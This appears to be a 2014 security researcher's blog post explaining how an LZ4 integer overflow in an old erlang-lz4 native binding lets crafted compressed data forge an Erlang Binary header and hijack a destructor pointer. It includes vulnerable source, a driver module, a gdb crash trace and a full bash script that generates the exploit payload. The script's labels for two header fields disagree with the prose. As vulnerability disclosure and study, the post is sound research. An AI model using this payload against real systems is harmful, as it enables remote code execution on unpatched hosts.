The Mouse Trap: A Final LZ4 Act

Killing Money

I've been getting a lot of emails, DMs, PMs, etc, congratulating me on my perseverance through the P.R. mess that has been the LZO/LZ4 bugs. Thanks for your support! But, let's be realistic, I've really just been killing money.

The amount of engineering effort that it takes to "prove" something vulnerable with an exploit is an often unnecessary add-on to a bug report. We're talking about potentially thousands of dollars in consulting hours lost due to efforts that shouldn't be required in the first place. When a bug is reported and has been fixed, that's all that should be required to say "hey, we should patch this".

I think the information security industry is failing itself, its clients, and the general Internet community when we waste time asking people to "prove it with code". If the bug report is sufficiently elaborate, then perhaps time is better spent patching and moving on with it.

I chose to "prove it with code" because first of all I don't like to lose. I'm not going to lie, a lot of it was about the selfish need to prove myself right. But, I also did it because it's my job. I released these bugs in the first place because it was the right thing to do, and as an information security consultant, my job is to try and make the Internet safer.

So, by spending thousands of dollars in lost consulting time, I'm hoping to have saved a few companies out there hundreds of thousands of dollars in remediation, forensics, and engineering time, chasing down adversaries and critical bugs that could end up costing a lot more than just money.

With that said, I've had enough of this LZ4 bug. It was fun, but I've made my point.

Writing Twice In A Write-Once Language

Attacking Erlang as a language is fun times. Why? Because the Erlang virtual machine only allows objects to be written once. Each variable in the Erlang language can only be written at instantiation. If you want to write to that variable again, too darn bad. The VM forbids it. Just check out the simple example below. For those that aren't familiar with Erlang, run "apt-get install erlang" on a 32-bit machine (my test environment, as always, is x86 32-bit Debian 7.5.0).

Erlang/OTP 17 [erts-6.1] [source] [async-threads:10] [hipe] [kernel-poll:false]

Eshell V6.1 (abort with ^G)
1> Variable = "Hello".
"Hello"
2> Variable.
"Hello"
3> Variable = "Lol".
** exception error: no match of right hand side value "Lol"

In the above example we can see that the Erlang shell, "erl", allows us to set variables, similar to Python's interactive prompt. The only difference here is that you can only do so once. Further writes to the variable require deletion of said variable (in the shell, f(Variable) forgets the binding). This is because "=" in Erlang is a pattern match, not an assignment: the right side of an expression must always equal the left side, unless the left side has not yet been bound.

This is amazing for pattern matching functionality, and is part of the elegance of functional languages such as Erlang and Haskell.

I, personally, am a big fan of Erlang, and write a lot of code in it. I recently wrote a fuzzer for DNP3 for no other reason than to see if I could. I did. It was fun.

What isn't fun is attacking Erlang because of the nature of the language depicted above. It's not easy to mangle objects in memory when you can't alter them after the fact.

Oh, LZ4, You Slay Me^H^HErlang

But, that's where the beauty of an elegant bug like the LZ4 memory corruption flaw comes in. In order to use LZ4's optimized library, it's best to call into it from the Erlang language. To do this, a Native Implemented Function (NIF) must be constructed. This is basically the Erlang equivalent to Ruby or Python bindings that connect Erlang's language to an existing shared library.

What this means is, by calling the LZ4 Erlang module from within Erlang, we are actually talking to the LZ4 C library through a binding interface. This gives us an opportunity to attack the decompression function in the same way we would for any other system.

What's even better about this simple functionality is that because the variable we define with the decompressed data is set after the data has been decompressed, we are essentially corrupting an Object in memory as it is being instantiated.

Note: The maintainer of the erlang-lz4 NIF is smart and quick. They updated the erlang-lz4 package before I had a chance to get to it, so kudos to szktty. If you want to play with a vulnerable release of their code, please clone the repository on GitHub and then check out version 0.1.1.

To start off, let's take a look at how the NIF bindings work. You can follow along here.

static ERL_NIF_TERM
nif_uncompress(ErlNifEnv* env, int argc, const ERL_NIF_TERM argv[])
{
    ERL_NIF_TERM ret_term;
    ErlNifBinary src_bin, res_bin;
    long res_size;

    /* argv[0]: compressed data; argv[1]: caller-supplied output size */
    if (!enif_inspect_binary(env, argv[0], &src_bin) ||
        !enif_get_long(env, argv[1], &res_size))
        return 0;

    /* the allocator's return value is not checked */
    enif_alloc_binary((size_t)res_size, &res_bin);

    if (LZ4_uncompress((char *)src_bin.data, (char *)res_bin.data,
                       res_bin.size) >= 0) {
        ret_term = enif_make_tuple2(env, atom_ok,
                                    enif_make_binary(env, &res_bin));
        enif_release_binary(&res_bin);
        return ret_term;
    } else {
        enif_release_binary(&res_bin);
        return enif_make_tuple2(env, atom_error, atom_uncompress_failed);
    }
}

In the above code, we can see how the Native Implemented Function handles a call to lz4:uncompress(). The first argument is the data to be decompressed, and the second argument is the size of the buffer that the data will be decompressed into.

This decompression buffer is essentially the variable, even though nothing has been bound to a variable yet. Why is this? Remember that variables are set once in Erlang, so once an object has been created in memory, it's done. That's it. No more mangling. If that object must be altered in any way, a new instantiation is used - not the object that was originally created. Therefore, we have to focus on corrupting the object as it is initially decompressed.

In the above example, we can see that res_bin is the ErlNifBinary that holds the destination buffer. The size of the destination buffer, as I mentioned a moment ago, is passed in as the second argument to lz4:uncompress(). Let's ignore for a moment that the author of the erlang-lz4 NIF never checks the allocator's return value, and focus on the contents of enif_alloc_binary.

int enif_alloc_binary(size_t size, ErlNifBinary* bin)
{
    Binary* refbin;

    refbin = erts_bin_drv_alloc_fnf(size); /* BUGBUG: alloc type? */
    if (refbin == NULL) {
        return 0; /* The NIF must take action */
    }
    refbin->flags = BIN_FLAG_DRV; /* BUGBUG: Flag? */
    erts_refc_init(&refbin->refc, 1);
    refbin->orig_size = (SWord) size;

    bin->size = size;
    bin->data = (unsigned char*) refbin->orig_bytes;
    bin->bin_term = THE_NON_VALUE;
    bin->ref_bin = refbin;
    return 1;
}

As can be seen above (or here on GitHub), enif_alloc_binary creates a Binary object in memory, which contains the actual allocated memory buffer orig_bytes. ErlNifBinary is simply a container for the Binary object, allowing for a semblance of inheritance in C, similar to PyObject variants in Python.

So, all we really need to understand here is the layout of a Binary in memory, since that is where the decompression payload actually resides.

typedef struct binary {
    ERTS_INTERNAL_BINARY_FIELDS
    SWord orig_size;
    char orig_bytes[1]; /* to be continued */
} Binary;

Here, we can see that the allocated object is defined almost exactly like objects in Python. For dynamic behavior, the structure's last member is a one-element array, implying that when this object is allocated in memory, any excess bytes allocated can be referenced starting at &orig_bytes[0], making Binary a dynamically sized object. This is the same methodology used in Python, and many other projects that require a semblance of classes, inheritance, or polymorphism in the C language.
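The trailing-array idiom is easy to see in isolation. What follows is a minimal sketch, not ERTS code: Blob, blob_alloc and blob_from_payload are hypothetical names made up for illustration. It shows the header and the payload living in one allocation, so a pointer to the payload is always a fixed distance from the header.

```c
#include <assert.h>
#include <stddef.h>
#include <stdlib.h>
#include <string.h>

/* Hypothetical stand-in for a Binary-like object; not the ERTS definition. */
typedef struct blob {
    size_t size;    /* number of payload bytes that follow the header */
    char bytes[1];  /* first payload byte; the rest trail the struct */
} Blob;

/* Allocate the header and n payload bytes as one contiguous block. */
static Blob *blob_alloc(size_t n)
{
    size_t payload = n ? n : 1;
    Blob *b = malloc(offsetof(Blob, bytes) + payload);
    if (b == NULL)
        return NULL;
    b->size = n;
    /* Zero the payload through a raw pointer into the same block. */
    memset((char *)b + offsetof(Blob, bytes), 0, payload);
    return b;
}

/* Recover the header address from a pointer to the payload. */
static Blob *blob_from_payload(char *payload)
{
    return (Blob *)(payload - offsetof(Blob, bytes));
}
```

The second helper is the part that matters for this bug: anyone who can write just before the payload pointer is writing into the header.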

Since we know that our decompression buffer will point to &orig_bytes[0], we now know that we can use the LZ4 memory corruption bug to overwrite previous fields in the Binary object with little effort. So, let's take a look at those fields.

#define ERTS_INTERNAL_BINARY_FIELDS \
    UWord flags;                    \
    erts_refc_t refc;               \
    ERTS_BINARY_STRUCT_ALIGNMENT

In the same file on GitHub, just above the Binary structure definition, we see the macro above. Counting the structure member orig_size, four fields sit in memory before orig_bytes: the flags integer, a reference counter refc, a padding field on 32-bit systems, and orig_size itself. All four are 32 bits wide on a 32-bit architecture, meaning that if we point our memory corruption to 16 bytes prior to the start of the decompression buffer, we can overwrite them all.
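To double check the 16-byte figure, here is a small sketch that models the 32-bit layout with fixed-width integers. ModelBinary and its field widths are assumptions drawn from the description above (in particular that erts_refc_t and the alignment padding are each 4 bytes on this target); it is not the real ERTS header.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

/* Hypothetical 32-bit model of Binary. Every header field is forced to
 * 4 bytes so the offsets match the 32-bit layout described in the text,
 * whatever machine this is compiled on. */
typedef struct model_binary {
    uint32_t flags;         /* UWord flags */
    uint32_t refc;          /* erts_refc_t refc (assumed 4 bytes wide) */
    uint32_t align_pad;     /* ERTS_BINARY_STRUCT_ALIGNMENT (assumed 4 bytes) */
    int32_t  orig_size;     /* SWord orig_size */
    char     orig_bytes[1]; /* the decompression buffer starts here */
} ModelBinary;

/* Distance in bytes from the start of the object to the buffer. */
static size_t header_size(void)
{
    return offsetof(ModelBinary, orig_bytes);
}

/* How far before the buffer a given header field begins. */
static size_t bytes_before_buffer(size_t field_offset)
{
    return header_size() - field_offset;
}
```

Under these assumptions flags begins 16 bytes before the buffer and refc 12 bytes before it, which is why a write that starts 16 bytes early covers the whole header.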

Now, you might be saying to yourself "Don, but why would we bother? Is this a crappy exploit scenario like with Ruby? Are we just corrupting the header and going home?" That's a fair question, my friend. But, remember, Erlang isn't a crappy programming language like Ruby. You can do real things in Erlang besides building Metasploit modules. It's used for real world applications. So, of course you can get more functionality out of an exploit in Erlang! It's a functional language!

Polymorphism's A Bitch

Now the great thing about the Binary object is that it's destructed at some point, just like any self respecting garbage collected virtual machine would do. This means that something, at some point, has to inspect the Binary object. Let's see how that works by looking at the NIF again.

    if (LZ4_uncompress((char *)src_bin.data, (char *)res_bin.data,
                       res_bin.size) >= 0) {
        ret_term = enif_make_tuple2(env, atom_ok,
                                    enif_make_binary(env, &res_bin));
        enif_release_binary(&res_bin);
        return ret_term;
    } else {
        enif_release_binary(&res_bin);
        return enif_make_tuple2(env, atom_error, atom_uncompress_failed);
    }

Remember the code above? If LZ4 decompression returns with an error, a call is immediately made to enif_release_binary. This seems familiar! This is almost exactly how the Python bindings react to a failure in LZ4. Huh! Go figure! enif_release_binary is called whether LZ4_uncompress returns an error or not, but in the case of failure, it's called immediately. This looks more promising, so let's check it out.

void enif_release_binary(ErlNifBinary* bin)
{
    if (bin->ref_bin != NULL) {
        Binary* refbin = bin->ref_bin;
        ASSERT(bin->bin_term == THE_NON_VALUE);
        if (erts_refc_dectest(&refbin->refc, 0) == 0) {
            erts_bin_free(refbin);

Back in the erl_nif.c file we can see that our corrupted Binary within the ErlNifBinary is immediately tested and passed to erts_bin_free. There are two very important things to note here:

1. The reference count in Binary is decremented, then tested for zero
2. erts_bin_free is simply passed the entire Binary structure

The first point is important because this immediately tells us that refc must be overwritten with 0x00000001 in order to make a call to erts_bin_free. The second point is the most important point: erts_bin_free doesn't know anything about our ErlNifBinary. This means that this is a generic memory destruct function, which also means that due to the polymorphic behavior of the virtual machine, it must presume that the dynamically allocated data should be interpreted somehow....

ERTS_GLB_INLINE void
erts_bin_free(Binary *bp)
{
    if (bp->flags & BIN_FLAG_MAGIC)
        ERTS_MAGIC_BIN_DESTRUCTOR(bp)(bp);
    if (bp->flags & BIN_FLAG_DRV)
        erts_free(ERTS_ALC_T_DRV_BINARY, (void *) bp);
    else
        erts_free(ERTS_ALC_T_BINARY, (void *) bp);
}

Bingo! We've got lift off. In the erl_binary.h file we can see that erts_bin_free does indeed attempt to interpret the type of binary it is passed. If the flags field has the BIN_FLAG_MAGIC bit (0x01) set, then a destructor function that resides in Binary is called. Awesome! But, our Binary isn't defined as a MAGIC object! So what! Just overwrite the flags field with 0x00000001, and you're good to go.
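The release-then-free path can be modeled in a few lines. This is a hedged sketch rather than the ERTS implementation: ModelHeader, model_init and model_release are hypothetical, MODEL_FLAG_DRV is a placeholder value, and the "destructor" is a harmless counter. It only shows that a header with flags and refc both set to 1 steers the free path into calling whatever pointer sits where the data begins.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define MODEL_FLAG_MAGIC 1u  /* stands in for BIN_FLAG_MAGIC (0x01 per the text) */
#define MODEL_FLAG_DRV   8u  /* placeholder; the real BIN_FLAG_DRV value is assumed */

typedef void (*destructor_fn)(void *);

typedef struct model_header {
    uint32_t flags;
    uint32_t refc;
    uint32_t align_pad;
    int32_t  orig_size;
} ModelHeader;

#define MODEL_OBJ_SIZE (sizeof(ModelHeader) + sizeof(destructor_fn))

enum release_result { STILL_REFERENCED, FREED_PLAIN, FREED_VIA_DESTRUCTOR };

static int destructor_calls = 0;
static void benign_destructor(void *obj) { (void)obj; destructor_calls++; }

/* Lay out a header followed by the bytes that begin the data area. */
static void model_init(unsigned char *obj, uint32_t flags, uint32_t refc,
                       destructor_fn first_data_word)
{
    ModelHeader h = { flags, refc, 0, 0 };
    memcpy(obj, &h, sizeof h);
    memcpy(obj + sizeof h, &first_data_word, sizeof first_data_word);
}

/* Same shape as release followed by free: decrement, test, dispatch. */
static enum release_result model_release(unsigned char *obj)
{
    ModelHeader h;
    memcpy(&h, obj, sizeof h);
    h.refc--;
    memcpy(obj, &h, sizeof h);
    if (h.refc != 0)
        return STILL_REFERENCED;
    if (h.flags & MODEL_FLAG_MAGIC) {
        destructor_fn fn;
        /* Type confusion: the first data bytes are read as a pointer. */
        memcpy(&fn, obj + sizeof h, sizeof fn);
        fn(obj);
        return FREED_VIA_DESTRUCTOR;
    }
    return FREED_PLAIN;
}
```

With the honest flag the data bytes are never interpreted; flip the flag word and the same bytes become a call target.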

MAGIC Happens

All that is left now is to evaluate what the structure looks like when it is interpreted as MAGIC. Oh, it is MAGIC indeed. Let's go back to global.h to inspect the proper structure.

typedef struct {
    ERTS_INTERNAL_BINARY_FIELDS
    SWord orig_size;
    void (*destructor)(Binary *);
    char magic_bin_data[1];
} ErtsMagicBinary;

Oh, well isn't that perfect. The offset where we would normally have correctly decompressed data in a Binary structure (at the member orig_bytes) contains a function pointer, destructor, in ErtsMagicBinary.

Well isn't that convenient!

This means that our payload will essentially contain the BIN_FLAG_MAGIC value, followed by a reference count of 0x00000001, followed by 32 bits of padding, followed by the original size value (any will do), followed by a function pointer. With this payload, we win.
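Spelled out as bytes, that header is five little-endian 32-bit words. The sketch below is illustrative only: put_le32 and build_forged_header are hypothetical helpers, the padding word is written as zero although its value should not matter, and the word order follows the description above.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

#define FORGED_HEADER_LEN 20

/* Store v at out[0..3], least significant byte first (x86 byte order). */
static void put_le32(unsigned char *out, uint32_t v)
{
    out[0] = (unsigned char)(v & 0xff);
    out[1] = (unsigned char)((v >> 8) & 0xff);
    out[2] = (unsigned char)((v >> 16) & 0xff);
    out[3] = (unsigned char)((v >> 24) & 0xff);
}

/* Fill out[0..19] with flags, refc, padding, orig_size, destructor. */
static size_t build_forged_header(unsigned char out[FORGED_HEADER_LEN],
                                  uint32_t orig_size, uint32_t destructor)
{
    put_le32(out + 0, 0x00000001u);   /* flags: BIN_FLAG_MAGIC */
    put_le32(out + 4, 0x00000001u);   /* refc: reaches zero on release */
    put_le32(out + 8, 0x00000000u);   /* alignment padding, value unused */
    put_le32(out + 12, orig_size);    /* any value will do */
    put_le32(out + 16, destructor);   /* lands where orig_bytes begins */
    return FORGED_HEADER_LEN;
}
```

Passing 0xdeadca75 as the destructor yields the trailing bytes 75 ca ad de, which is the address the crash ends up at.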

Let's try it. Here is a simple Erlang program to call lz4:uncompress() with data from a payload file.

-module(donb).
-export([doit/1]).

doit(File) ->
    io:format("doit!~n"),
    case file:read_file(File) of
        {ok, B} ->
            X = attack(B),
            {ok, X};
        {error, R} ->
            {error, file:format_error(R)}
    end.

attack(B) ->
    R = lz4:uncompress(B, 16#00100000),
    io:format("uncompress returned ~w~n", [R]).

Compile the file 'donb.erl' in Erlang using c(donb). Then, simply test it with the payload I described above. Adjustments to the Python payload from my previous blog post will do. The offset is the same.

donb@debian$ /usr/local/bin/erl -noshell -run donb doit ~/lz4/erlang.lz4 -s init stop
doit!
Segmentation fault (core dumped)
donb@debian$ gdb -q /usr/local/lib/erlang/erts-6.1/bin/beam core
Reading symbols from /usr/local/lib/erlang/erts-6.1/bin/beam...done.
[New LWP 591]
[New LWP 595]
[New LWP 596]
[New LWP 597]
[New LWP 598]
[New LWP 599]
[New LWP 600]
[New LWP 601]
[New LWP 602]
[New LWP 603]
[New LWP 604]
warning: Can't read pathname for load map: Input/output error.
[Thread debugging using libthread_db enabled]
Using host libthread_db library "/lib/i386-linux-gnu/i686/cmov/libthread_db.so.1".
Core was generated by `/usr/local/lib/erlang/erts-6.1/bin/beam -- -root /usr/local/lib/erlang -prognam'.
Program terminated with signal 11, Segmentation fault.
#0 0xdeadca75 in ?? ()
(gdb)

And there you have it. The elegance of polymorphism in C once again allows us to turn Binary into MAGIC and end up with Remote Code Execution from a single integer overflow. Pulling that off in a language that doesn't even let you write to a variable twice is a win for LZ4 corruption.

Isn't that a beautiful thing? I think so.

Best,

Don A. Bailey

Founder / CEO

Lab Mouse Security

@InfoSecMouse

https://www.securitymouse.com/

#!/bin/bash
# Erlang LZ4 exploit (should work for all OTP vers) - donb@securitymouse.com
# Works for versions of erlang-lz4 prior to 2x
# For testing only. Do not misuse.

FILE=./erlang.lz4

# write the escape string in $1 (e.g. "\x0f") to the file as raw bytes
append()
{
    printf "$1" >> "$FILE"
}

# start from an empty payload file
init()
{
    rm -f "$FILE"
    touch "$FILE"
}

# append $1 copies of the byte 0xff
large()
{
    x="\"\\xff\" x $1"
    perl -e "print $x" >> "$FILE"
}

# append the escape string in $2, $1 times
append_size()
{
    i=0
    while [ "$i" -lt "$1" ]; do
        append "$2"
        i=$((i+1))
    done
}

# initialize the file
init

# simple literal run; no mask
append "\x0f"

# copy the fifteen bytes and embed a null ref
# the second mask must be embedded here as well
# note that the second mask starts at the first 0xff
append "\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff\xff"

# goal is 0xfffffff0
# now we need (16843008 - 13) 0xff bytes
large 16842995
append "\xdd"

# Binary structure overwrite
# we need 76 bytes but for more than 15 we need a mask
append "\xf0\x39"

# append the forged Binary header, flags word first
append "\x01\x00\x00\x00" # BIN_FLAG_MAGIC
append "\x01\x00\x00\x00" # refcount
append "\x00\x00\x10\x00" # orig_size
append "\xde\xad\xca\x74" # padding(?)
append "\x75\xca\xad\xde" # destructor
append "\xde\xad\xca\x79" # magic bin data
append "\xde\xad\xca\x7a" #
append "\xde\xad\xca\x75" #
append "\xde\xad\xca\x76" #
append "\xe0\x6f\x2c\x08" #
append "\x00\x00\x00\x00" #

# now finish with a bad reference
append "\xff\xff"
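The "goal is 0xfffffff0" comment in the script can be checked with a few lines of arithmetic. This sketch assumes the usual LZ4 length encoding (a 4-bit field of 15, then 255 added per 0xff extension byte, then one final byte, plus a minimum match of 4) and a 32-bit length counter with no overflow check; the script itself only states the goal and the byte count, so the breakdown and the function names here are illustrative assumptions.

```c
#include <assert.h>
#include <stdint.h>

/* Length a decoder would reach if it summed the extension bytes into a
 * 32-bit counter without checking for overflow. */
static uint32_t accumulated_length(uint32_t nibble, uint32_t ff_bytes,
                                   uint32_t last_byte, uint32_t min_match)
{
    uint32_t length = nibble;
    length += ff_bytes * 255u;  /* each 0xff extension byte adds 255 */
    length += last_byte;        /* terminating extension byte */
    length += min_match;        /* assumed minimum match length */
    return length;
}

/* On a 32-bit target, adding this length to a pointer moves it
 * backwards by the two's complement of the length. */
static uint32_t bytes_stepped_back(uint32_t length)
{
    return (uint32_t)(0u - length);
}
```

With 16843008 extension bytes (the 13 in the fixed string plus the 16842995 from large) and a final byte of 0xdd, the sum comes to 0xfffffff0, which behaves as a step of 16 bytes backwards. That matches the size of the 32-bit Binary header in front of the buffer.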

Thursday, July 10, 2014

A Final LZ4 Act - Hacking Erlang
